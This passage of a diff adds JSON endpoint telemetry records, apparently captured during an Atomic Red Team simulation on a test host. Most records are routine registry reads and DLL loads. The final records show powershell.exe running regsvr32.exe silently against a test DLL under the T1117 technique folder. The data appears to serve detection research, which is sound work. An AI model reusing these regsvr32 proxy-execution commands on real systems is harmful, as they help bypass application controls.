"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "calc.exe", + "image_path": "C:\\Windows\\System32\\calc.exe", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "process", + "pid": 2652, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1216, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573241740000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573241670000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "process", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-55A4EE79.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1284, + "ppid": 7036, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7428, + "ppid": 7036, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573242340000, + "unique_pid": 